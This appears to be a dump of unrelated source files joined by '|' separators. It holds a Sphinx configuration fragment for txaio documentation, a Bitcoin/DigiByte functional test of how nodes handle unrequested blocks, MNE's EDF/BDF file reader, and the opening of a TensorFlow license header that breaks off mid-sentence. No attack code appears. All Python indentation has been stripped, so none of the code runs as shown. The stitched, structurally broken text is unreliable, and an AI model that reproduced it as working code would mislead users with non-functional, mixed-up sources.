exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
if sphinx_rtd_theme:
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
else:
html_theme = "default"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# Show full, global TOC in sidebar
# http://stackoverflow.com/a/19007358
# http://sphinx-doc.org/config.html#confval-html_sidebars
html_sidebars = {
'**': [
'globaltoc.html',
'relations.html',
'sourcelink.html',
'searchbox.html'
],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'txaiodoc'
# http://sphinx-doc.org/ext/intersphinx.html
intersphinx_mapping = {
'py2': ('https://docs.python.org/2', None),
'py3': ('https://docs.python.org/3', None),
'python': ('https://docs.python.org/3', None),
'rtd': ('https://docs.readthedocs.io/en/latest/', None),
'autobahn': ('https://autobahn.readthedocs.io/en/latest/', None),
'zlmdb': ('https://zlmdb.readthedocs.io/en/latest/', None),
}
|
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
'''
AcceptBlockTest -- test processing of unrequested blocks.
Since behavior differs when receiving unrequested blocks from whitelisted peers
versus non-whitelisted peers, this tests the behavior of both (effectively two
separate tests running in parallel).
Setup: two nodes, node0 and node1, not connected to each other. Node0 does not
whitelist localhost, but node1 does. They will each be on their own chain for
this test.
We have one NodeConn connection to each, test_node and white_node respectively.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance.
3. Mine a block that forks the previous block, and deliver to each node from
corresponding peer.
Node0 should not process this block (just accept the header), because it is
unrequested and doesn't have more work than the tip.
Node1 should process because this is coming from a whitelisted peer.
4. Send another block that builds on the forking block.
Node0 should process this block but be stuck on the shorter chain, because
it's missing an intermediate block.
Node1 should reorg to this longer chain.
4b.Send 288 more blocks on the longer chain.
Node0 should process all but the last block (too far ahead in height).
Send all headers to Node1, and then send the last block in that chain.
Node1 should accept the block because it's coming from a whitelisted peer.
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
Node0 should figure out that Node0 has the missing height 2 block and send a
getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
while True:
with mininode_lock:
if self.verack_received:
return
time.sleep(0.05)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
self.connection.send_message(msg_ping(nonce=self.ping_counter))
received_pong = False
sleep_time = 0.05
while not received_pong and timeout > 0:
time.sleep(sleep_time)
timeout -= sleep_time
with mininode_lock:
if self.last_pong.nonce == self.ping_counter:
received_pong = True
self.ping_counter += 1
return received_pong
class AcceptBlockTest(BitcoinTestFramework):
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("DIGIBYTED", "digibyted"),
help="digibyted binary to test")
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 2
def setup_network(self):
# Node0 will be used to test behavior of processing unrequested blocks
# from peers which are not whitelisted, while Node1 will be used for
# the whitelisted case.
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug"],
binary=self.options.testbinary))
self.nodes.append(start_node(1, self.options.tmpdir,
["-debug", "-whitelist=127.0.0.1"],
binary=self.options.testbinary))
def run_test(self):
# Setup the p2p connections and start up the network thread.
test_node = TestNode() # connects to node0 (not whitelisted)
white_node = TestNode() # connects to node1 (whitelisted)
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], white_node))
test_node.add_connection(connections[0])
white_node.add_connection(connections[1])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
test_node.wait_for_verack()
white_node.wait_for_verack()
# 1. Have both nodes mine a block (leave IBD)
[ n.generate(1) for n in self.nodes ]
tips = [ int("0x" + n.getbestblockhash(), 0) for n in self.nodes ]
# 2. Send one block that builds on each tip.
# This should be accepted.
blocks_h2 = [] # the height 2 blocks on each node's chain
block_time = int(time.time()) + 1
for i in range(2):
blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
blocks_h2[i].solve()
block_time += 1
test_node.send_message(msg_block(blocks_h2[0]))
white_node.send_message(msg_block(blocks_h2[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
assert_equal(self.nodes[0].getblockcount(), 2)
assert_equal(self.nodes[1].getblockcount(), 2)
print("First height 2 block accepted by both nodes")
# 3. Send another block that builds on the original tip.
blocks_h2f = [] # Blocks at height 2 that fork off the main chain
for i in range(2):
blocks_h2f.append(create_block(tips[i], create_coinbase(2), blocks_h2[i].nTime+1))
blocks_h2f[i].solve()
test_node.send_message(msg_block(blocks_h2f[0]))
white_node.send_message(msg_block(blocks_h2f[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h2f[0].hash:
assert_equal(x['status'], "headers-only")
for x in self.nodes[1].getchaintips():
if x['hash'] == blocks_h2f[1].hash:
assert_equal(x['status'], "valid-headers")
print("Second height 2 block accepted only from whitelisted peer")
# 4. Now send another block that builds on the forking chain.
blocks_h3 = []
for i in range(2):
blocks_h3.append(create_block(blocks_h2f[i].sha256, create_coinbase(3), blocks_h2f[i].nTime+1))
blocks_h3[i].solve()
test_node.send_message(msg_block(blocks_h3[0]))
white_node.send_message(msg_block(blocks_h3[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
# Since the earlier block was not processed by node0, the new block
# can't be fully validated.
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h3[0].hash:
assert_equal(x['status'], "headers-only")
# But this block should be accepted by node0 since it has more work.
try:
self.nodes[0].getblock(blocks_h3[0].hash)
print("Unrequested more-work block accepted from non-whitelisted peer")
except:
raise AssertionError("Unrequested more work block was not processed")
# Node1 should have accepted and reorged.
assert_equal(self.nodes[1].getblockcount(), 3)
print("Successfully reorged to length 3 chain from whitelisted peer")
# 4b. Now mine 288 more blocks and deliver; all should be processed but
# the last (height-too-high) on node0. Node1 should process the tip if
# we give it the headers chain leading to the tip.
tips = blocks_h3
headers_message = msg_headers()
all_blocks = [] # node0's blocks
for j in range(2):
for i in range(288):
next_block = create_block(tips[j].sha256, create_coinbase(i + 4), tips[j].nTime+1)
next_block.solve()
if j==0:
test_node.send_message(msg_block(next_block))
all_blocks.append(next_block)
else:
headers_message.headers.append(CBlockHeader(next_block))
tips[j] = next_block
time.sleep(2)
for x in all_blocks:
try:
self.nodes[0].getblock(x.hash)
if x == all_blocks[287]:
raise AssertionError("Unrequested block too far-ahead should have been ignored")
except:
if x == all_blocks[287]:
print("Unrequested block too far-ahead not processed")
else:
raise AssertionError("Unrequested block with more work should have been accepted")
headers_message.headers.pop() # Ensure the last block is unrequested
white_node.send_message(headers_message) # Send headers leading to tip
white_node.send_message(msg_block(tips[1])) # Now deliver the tip
try:
white_node.sync_with_ping()
self.nodes[1].getblock(tips[1].hash)
print("Unrequested block far ahead of tip accepted from whitelisted peer")
except:
raise AssertionError("Unrequested block from whitelisted peer not accepted")
# 5. Test handling of unrequested block on the node that didn't process
# Should still not be processed (even though it has a child that has more
# work).
test_node.send_message(msg_block(blocks_h2f[0]))
# Here, if the sleep is too short, the test could falsely succeed (if the
# node hasn't processed the block by the time the sleep returns, and then
# the node processes it and incorrectly advances the tip).
# But this would be caught later on, when we verify that an inv triggers
# a getdata request for this block.
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
print("Unrequested block that would complete more-work chain was ignored")
# 6. Try to get node to request the missing block.
# Poke the node with an inv for block at height 3 and see if that
# triggers a getdata on block 2 (it should if block 2 is missing).
with mininode_lock:
# Clear state so we can check the getdata request
test_node.last_getdata = None
test_node.send_message(msg_inv([CInv(2, blocks_h3[0].sha256)]))
test_node.sync_with_ping()
with mininode_lock:
getdata = test_node.last_getdata
# Check that the getdata includes the right block
assert_equal(getdata.inv[0].hash, blocks_h2f[0].sha256)
print("Inv at tip triggered getdata for unprocessed block")
# 7. Send the missing block for the third time (now it is requested)
test_node.send_message(msg_block(blocks_h2f[0]))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 290)
print("Successfully reorged to longer chain from non-whitelisted peer")
[ c.disconnect_node() for c in connections ]
if __name__ == '__main__':
AcceptBlockTest().main()
|
|
"""Conversion tool from EDF+,BDF to FIF
"""
# Authors: Teon Brooks <teon.brooks@gmail.com>
# Martin Billinger <martin.billinger@tugraz.at>
#
# License: BSD (3-clause)
import os
import calendar
import datetime
import re
import warnings
from math import ceil, floor
import numpy as np
from ...utils import verbose, logger
from ..base import _BaseRaw, _check_update_montage
from ..meas_info import _empty_info
from ..pick import pick_types
from ..constants import FIFF
from ...filter import resample
from ...externals.six.moves import zip
class RawEDF(_BaseRaw):
"""Raw object from EDF+,BDF file
Parameters
----------
input_fname : str
Path to the EDF+,BDF file.
montage : str | None | instance of Montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0).
eog : list or tuple
Names of channels or list of indices that should be designated
EOG channels. Values should correspond to the electrodes in the
edf file. Default is None.
misc : list or tuple
Names of channels or list of indices that should be designated
MISC channels. Values should correspond to the electrodes in the
edf file. Default is None.
stim_channel : str | int | None
The channel name or channel index (starting at 0).
-1 corresponds to the last channel (default).
If None, there will be no stim channel added.
annot : str | None
Path to annotation file.
If None, no derived stim channel will be added (for files requiring
annotation file to interpret stim channel).
annotmap : str | None
Path to annotation map file containing mapping from label to trigger.
Must be specified if annot is not None.
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
@verbose
def __init__(self, input_fname, montage, eog=None, misc=None,
stim_channel=-1, annot=None, annotmap=None,
preload=False, verbose=None):
logger.info('Extracting edf Parameters from %s...' % input_fname)
input_fname = os.path.abspath(input_fname)
info, edf_info = _get_edf_info(input_fname, stim_channel,
annot, annotmap,
eog, misc, preload)
logger.info('Creating Raw.info structure...')
_check_update_montage(info, montage)
if bool(annot) != bool(annotmap):
warnings.warn(("Stimulus Channel will not be annotated. "
"Both 'annot' and 'annotmap' must be specified."))
# Raw attributes
last_samps = [edf_info['nsamples'] - 1]
super(RawEDF, self).__init__(
info, preload, filenames=[input_fname], raw_extras=[edf_info],
last_samps=last_samps, orig_format='int',
verbose=verbose)
logger.info('Ready.')
@verbose
def _read_segment_file(self, data, idx, offset, fi, start, stop,
cals, mult):
"""Read a chunk of raw data"""
from scipy.interpolate import interp1d
if mult is not None:
# XXX "cals" here does not function the same way as in RawFIF,
# and for efficiency we want to be able to combine mult and cals
# so proj support will have to wait until this is resolved
raise NotImplementedError('mult is not supported yet')
# RawFIF and RawEDF think of "stop" differently, easiest to increment
# here and refactor later
stop += 1
sel = np.arange(self.info['nchan'])[idx]
n_samps = self._raw_extras[fi]['n_samps']
buf_len = self._raw_extras[fi]['max_samp']
sfreq = self.info['sfreq']
n_chan = self.info['nchan']
data_size = self._raw_extras[fi]['data_size']
data_offset = self._raw_extras[fi]['data_offset']
stim_channel = self._raw_extras[fi]['stim_channel']
tal_channel = self._raw_extras[fi]['tal_channel']
annot = self._raw_extras[fi]['annot']
annotmap = self._raw_extras[fi]['annotmap']
subtype = self._raw_extras[fi]['subtype']
# this is used to deal with indexing in the middle of a sampling period
blockstart = int(floor(float(start) / buf_len) * buf_len)
blockstop = int(ceil(float(stop) / buf_len) * buf_len)
# gain constructor
physical_range = np.array([ch['range'] for ch in self.info['chs']])
cal = np.array([ch['cal'] for ch in self.info['chs']])
gains = np.atleast_2d(self._raw_extras[0]['units'] *
(physical_range / cal))
# physical dimension in uV
physical_min = self._raw_extras[fi]['physical_min'] * 1e-6
digital_min = self._raw_extras[fi]['digital_min']
offsets = np.atleast_2d(physical_min - (digital_min * gains)).T
picks = [stim_channel, tal_channel]
offsets[picks] = 0
read_size = blockstop - blockstart
this_data = np.empty((len(sel), buf_len))
data = data[:, offset:offset + (stop - start)]
"""
Consider this example:
tmin, tmax = (2, 27)
read_size = 30
buf_len = 10
sfreq = 1.
+---------+---------+---------+
File structure: | buf0 | buf1 | buf2 |
+---------+---------+---------+
File time: 0 10 20 30
+---------+---------+---------+
Requested time: 2 27
| |
blockstart blockstop
| |
start stop
We need 27 - 2 = 25 samples (per channel) to store our data, and
we need to read from 3 buffers (30 samples) to get all of our data.
On all reads but the first, the data we read starts at
the first sample of the buffer. On all reads but the last,
the data we read ends on the last sample of the buffer.
We call this_data the variable that stores the current buffer's data,
and data the variable that stores the total output.
On the first read, we need to do this::
>>> data[0:buf_len-2] = this_data[2:buf_len]
On the second read, we need to do::
>>> data[1*buf_len-2:2*buf_len-2] = this_data[0:buf_len]
On the final read, we need to do::
>>> data[2*buf_len-2:3*buf_len-2-3] = this_data[0:buf_len-3]
"""
with open(self._filenames[fi], 'rb', buffering=0) as fid:
# extract data
fid.seek(data_offset + blockstart * n_chan * data_size)
n_blk = int(ceil(float(read_size) / buf_len))
start_offset = start - blockstart
end_offset = blockstop - stop
for bi in range(n_blk):
# Triage start (sidx) and end (eidx) indices for
# data (d) and read (r)
if bi == 0:
d_sidx = 0
r_sidx = start_offset
else:
d_sidx = bi * buf_len - start_offset
r_sidx = 0
if bi == n_blk - 1:
d_eidx = data.shape[1]
r_eidx = buf_len - end_offset
else:
d_eidx = (bi + 1) * buf_len - start_offset
r_eidx = buf_len
n_buf_samp = r_eidx - r_sidx
count = 0
for j, samp in enumerate(n_samps):
# bdf data: 24bit data
if j not in sel:
fid.seek(samp * data_size, 1)
continue
if samp == buf_len:
# use faster version with skips built in
if r_sidx > 0:
fid.seek(r_sidx * data_size, 1)
ch_data = _read_ch(fid, subtype, n_buf_samp, data_size)
if r_eidx < buf_len:
fid.seek((buf_len - r_eidx) * data_size, 1)
else:
# read in all the data and triage appropriately
ch_data = _read_ch(fid, subtype, samp, data_size)
if j == tal_channel:
# don't resample tal_channel,
# pad with zeros instead.
n_missing = int(buf_len - samp)
ch_data = np.hstack([ch_data, [0] * n_missing])
ch_data = ch_data[r_sidx:r_eidx]
elif j == stim_channel:
if annot and annotmap or \
tal_channel is not None:
# don't bother with resampling the stim ch
# because it gets overwritten later on.
ch_data = np.zeros(n_buf_samp)
else:
warnings.warn('Interpolating stim channel.'
' Events may jitter.')
oldrange = np.linspace(0, 1, samp + 1, True)
newrange = np.linspace(0, 1, buf_len, False)
newrange = newrange[r_sidx:r_eidx]
ch_data = interp1d(
oldrange, np.append(ch_data, 0),
kind='zero')(newrange)
else:
ch_data = resample(ch_data, buf_len, samp,
npad=0)[r_sidx:r_eidx]
this_data[count, :n_buf_samp] = ch_data
count += 1
data[:, d_sidx:d_eidx] = this_data[:, :n_buf_samp]
data *= gains.T[sel]
data += offsets[sel]
# only try to read the stim channel if it's not None and it's
# actually one of the requested channels
if stim_channel is not None and (sel == stim_channel).sum() > 0:
stim_channel_idx = np.where(sel == stim_channel)[0]
if annot and annotmap:
evts = _read_annot(annot, annotmap, sfreq,
self._last_samps[fi])
data[stim_channel_idx, :] = evts[start:stop]
elif tal_channel is not None:
tal_channel_idx = np.where(sel == tal_channel)[0][0]
evts = _parse_tal_channel(data[tal_channel_idx])
self._raw_extras[fi]['events'] = evts
unique_annots = sorted(set([e[2] for e in evts]))
mapping = dict((a, n + 1) for n, a in enumerate(unique_annots))
stim = np.zeros(read_size)
for t_start, t_duration, annotation in evts:
evid = mapping[annotation]
n_start = int(t_start * sfreq)
n_stop = int(t_duration * sfreq) + n_start - 1
# make sure events without duration get one sample
n_stop = n_stop if n_stop > n_start else n_start + 1
if any(stim[n_start:n_stop]):
raise NotImplementedError('EDF+ with overlapping '
'events not supported.')
stim[n_start:n_stop] = evid
data[stim_channel_idx, :] = stim[start:stop]
else:
# Allows support for up to 16-bit trigger values (2 ** 16 - 1)
stim = np.bitwise_and(data[stim_channel_idx].astype(int),
65535)
data[stim_channel_idx, :] = stim
def _read_ch(fid, subtype, samp, data_size):
"""Helper to read a number of samples for a single channel"""
if subtype in ('24BIT', 'bdf'):
ch_data = np.fromfile(fid, dtype=np.uint8,
count=samp * data_size)
ch_data = ch_data.reshape(-1, 3).astype(np.int32)
ch_data = ((ch_data[:, 0]) +
(ch_data[:, 1] << 8) +
(ch_data[:, 2] << 16))
# 24th bit determines the sign
ch_data[ch_data >= (1 << 23)] -= (1 << 24)
# edf data: 16bit data
else:
ch_data = np.fromfile(fid, dtype='<i2', count=samp)
return ch_data
def _parse_tal_channel(tal_channel_data):
"""Parse time-stamped annotation lists (TALs) in stim_channel
and return list of events.
Parameters
----------
tal_channel_data : ndarray, shape = [n_samples]
channel data in EDF+ TAL format
Returns
-------
events : list
List of events. Each event contains [start, duration, annotation].
References
----------
http://www.edfplus.info/specs/edfplus.html#tal
"""
# convert tal_channel to an ascii string
tals = bytearray()
for s in tal_channel_data:
i = int(s)
tals.extend([i % 256, i // 256])
regex_tal = '([+-]\d+\.?\d*)(\x15(\d+\.?\d*))?(\x14.*?)\x14\x00'
tal_list = re.findall(regex_tal, tals.decode('ascii'))
events = []
for ev in tal_list:
onset = float(ev[0])
duration = float(ev[2]) if ev[2] else 0
for annotation in ev[3].split('\x14')[1:]:
if annotation:
events.append([onset, duration, annotation])
return events
def _get_edf_info(fname, stim_channel, annot, annotmap, eog, misc, preload):
"""Extracts all the information from the EDF+,BDF file"""
if eog is None:
eog = []
if misc is None:
misc = []
info = _empty_info()
info['filename'] = fname
edf_info = dict()
edf_info['annot'] = annot
edf_info['annotmap'] = annotmap
edf_info['events'] = []
with open(fname, 'rb') as fid:
assert(fid.tell() == 0)
fid.seek(8)
fid.read(80).strip().decode() # subject id
fid.read(80).strip().decode() # recording id
day, month, year = [int(x) for x in re.findall('(\d+)',
fid.read(8).decode())]
hour, minute, sec = [int(x) for x in re.findall('(\d+)',
fid.read(8).decode())]
date = datetime.datetime(year + 2000, month, day, hour, minute, sec)
info['meas_date'] = calendar.timegm(date.utctimetuple())
edf_info['data_offset'] = header_nbytes = int(fid.read(8).decode())
subtype = fid.read(44).strip().decode()[:5]
if len(subtype) > 0:
edf_info['subtype'] = subtype
else:
edf_info['subtype'] = os.path.splitext(fname)[1][1:].lower()
edf_info['n_records'] = n_records = int(fid.read(8).decode())
# record length in seconds
record_length = float(fid.read(8).decode())
if record_length == 0:
edf_info['record_length'] = record_length = 1.
warnings.warn('Header information is incorrect for record length. '
'Default record length set to 1.')
else:
edf_info['record_length'] = record_length
info['nchan'] = nchan = int(fid.read(4).decode())
channels = list(range(info['nchan']))
ch_names = [fid.read(16).strip().decode() for ch in channels]
[fid.read(80).strip().decode() for ch in channels] # transducer
units = [fid.read(8).strip().decode() for ch in channels]
for i, unit in enumerate(units):
if unit == 'uV':
units[i] = 1e-6
else:
units[i] = 1
edf_info['units'] = units
physical_min = np.array([float(fid.read(8).decode())
for ch in channels])
edf_info['physical_min'] = physical_min
physical_max = np.array([float(fid.read(8).decode())
for ch in channels])
digital_min = np.array([float(fid.read(8).decode())
for ch in channels])
edf_info['digital_min'] = digital_min
digital_max = np.array([float(fid.read(8).decode())
for ch in channels])
prefiltering = [fid.read(80).strip().decode() for ch in channels][:-1]
highpass = np.ravel([re.findall('HP:\s+(\w+)', filt)
for filt in prefiltering])
lowpass = np.ravel([re.findall('LP:\s+(\w+)', filt)
for filt in prefiltering])
high_pass_default = 0.
if highpass.size == 0:
info['highpass'] = high_pass_default
elif all(highpass):
if highpass[0] == 'NaN':
info['highpass'] = high_pass_default
elif highpass[0] == 'DC':
info['highpass'] = 0.
else:
info['highpass'] = float(highpass[0])
else:
info['highpass'] = float(np.min(highpass))
warnings.warn('Channels contain different highpass filters. '
'Highest filter setting will be stored.')
if lowpass.size == 0:
info['lowpass'] = None
elif all(lowpass):
if lowpass[0] == 'NaN':
info['lowpass'] = None
else:
info['lowpass'] = float(lowpass[0])
else:
info['lowpass'] = float(np.min(lowpass))
warnings.warn('%s' % ('Channels contain different lowpass filters.'
' Lowest filter setting will be stored.'))
# number of samples per record
n_samps = np.array([int(fid.read(8).decode()) for ch in channels])
edf_info['n_samps'] = n_samps
fid.read(32 * info['nchan']).decode() # reserved
assert fid.tell() == header_nbytes
physical_ranges = physical_max - physical_min
cals = digital_max - digital_min
# Some keys to be consistent with FIF measurement info
info['description'] = None
info['buffer_size_sec'] = 10.
if edf_info['subtype'] in ('24BIT', 'bdf'):
edf_info['data_size'] = 3 # 24-bit (3 byte) integers
else:
edf_info['data_size'] = 2 # 16-bit (2 byte) integers
# Creates a list of dicts of eeg channels for raw.info
logger.info('Setting channel info structure...')
info['chs'] = []
info['ch_names'] = ch_names
tal_ch_name = 'EDF Annotations'
if tal_ch_name in ch_names:
tal_channel = ch_names.index(tal_ch_name)
else:
tal_channel = None
edf_info['tal_channel'] = tal_channel
if tal_channel is not None and stim_channel is not None and not preload:
raise RuntimeError('%s' % ('EDF+ Annotations (TAL) channel needs to be'
' parsed completely on loading.'
' You must set preload parameter to True.'))
if stim_channel == -1:
stim_channel = info['nchan'] - 1
for idx, ch_info in enumerate(zip(ch_names, physical_ranges, cals)):
ch_name, physical_range, cal = ch_info
chan_info = {}
chan_info['cal'] = cal
chan_info['logno'] = idx + 1
chan_info['scanno'] = idx + 1
chan_info['range'] = physical_range
chan_info['unit_mul'] = 0.
chan_info['ch_name'] = ch_name
chan_info['unit'] = FIFF.FIFF_UNIT_V
chan_info['coord_frame'] = FIFF.FIFFV_COORD_HEAD
chan_info['coil_type'] = FIFF.FIFFV_COIL_EEG
chan_info['kind'] = FIFF.FIFFV_EEG_CH
chan_info['eeg_loc'] = np.zeros(3)
chan_info['loc'] = np.zeros(12)
if ch_name in eog or idx in eog or idx - nchan in eog:
chan_info['coil_type'] = FIFF.FIFFV_COIL_NONE
chan_info['kind'] = FIFF.FIFFV_EOG_CH
if ch_name in misc or idx in misc or idx - nchan in misc:
chan_info['coil_type'] = FIFF.FIFFV_COIL_NONE
chan_info['kind'] = FIFF.FIFFV_MISC_CH
check1 = stim_channel == ch_name
check2 = stim_channel == idx
check3 = info['nchan'] > 1
stim_check = np.logical_and(np.logical_or(check1, check2), check3)
if stim_check:
chan_info['range'] = 1
chan_info['cal'] = 1
chan_info['coil_type'] = FIFF.FIFFV_COIL_NONE
chan_info['unit'] = FIFF.FIFF_UNIT_NONE
chan_info['kind'] = FIFF.FIFFV_STIM_CH
chan_info['ch_name'] = 'STI 014'
info['ch_names'][idx] = chan_info['ch_name']
units[idx] = 1
if isinstance(stim_channel, str):
stim_channel = idx
if tal_channel == idx:
chan_info['range'] = 1
chan_info['cal'] = 1
chan_info['coil_type'] = FIFF.FIFFV_COIL_NONE
chan_info['unit'] = FIFF.FIFF_UNIT_NONE
chan_info['kind'] = FIFF.FIFFV_MISC_CH
info['chs'].append(chan_info)
edf_info['stim_channel'] = stim_channel
# sfreq defined as the max sampling rate of eeg
picks = pick_types(info, meg=False, eeg=True)
if len(picks) == 0:
edf_info['max_samp'] = max_samp = n_samps.max()
else:
edf_info['max_samp'] = max_samp = n_samps[picks].max()
info['sfreq'] = max_samp / record_length
edf_info['nsamples'] = int(n_records * max_samp)
if info['lowpass'] is None:
info['lowpass'] = info['sfreq'] / 2.
return info, edf_info
def _read_annot(annot, annotmap, sfreq, data_length):
"""Annotation File Reader
Parameters
----------
annot : str
Path to annotation file.
annotmap : str
Path to annotation map file containing mapping from label to trigger.
sfreq : float
Sampling frequency.
data_length : int
Length of the data file.
Returns
-------
stim_channel : ndarray
An array containing stimulus trigger events.
"""
pat = '([+/-]\d+.\d+),(\w+)'
annot = open(annot).read()
triggers = re.findall(pat, annot)
times, values = zip(*triggers)
times = [float(time) * sfreq for time in times]
pat = '(\w+):(\d+)'
annotmap = open(annotmap).read()
mappings = re.findall(pat, annotmap)
maps = {}
for mapping in mappings:
maps[mapping[0]] = mapping[1]
triggers = [int(maps[value]) for value in values]
stim_channel = np.zeros(data_length)
for time, trigger in zip(times, triggers):
stim_channel[time] = trigger
return stim_channel
def read_raw_edf(input_fname, montage=None, eog=None, misc=None,
stim_channel=-1, annot=None, annotmap=None,
preload=False, verbose=None):
"""Reader function for EDF+, BDF conversion to FIF
Parameters
----------
input_fname : str
Path to the EDF+,BDF file.
montage : str | None | instance of Montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0).
eog : list or tuple
Names of channels or list of indices that should be designated
EOG channels. Values should correspond to the electrodes in the
edf file. Default is None.
misc : list or tuple
Names of channels or list of indices that should be designated
MISC channels. Values should correspond to the electrodes in the
edf file. Default is None.
stim_channel : str | int | None
The channel name or channel index (starting at 0).
-1 corresponds to the last channel (default).
If None, there will be no stim channel added.
annot : str | None
Path to annotation file.
If None, no derived stim channel will be added (for files requiring
annotation file to interpret stim channel).
annotmap : str | None
Path to annotation map file containing mapping from label to trigger.
Must be specified if annot is not None.
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
raw : Instance of RawEDF
A Raw object containing EDF data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawEDF(input_fname=input_fname, montage=montage, eog=eog, misc=misc,
stim_channel=stim_channel, annot=annot, annotmap=annotmap,
preload=preload, verbose=verbose)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
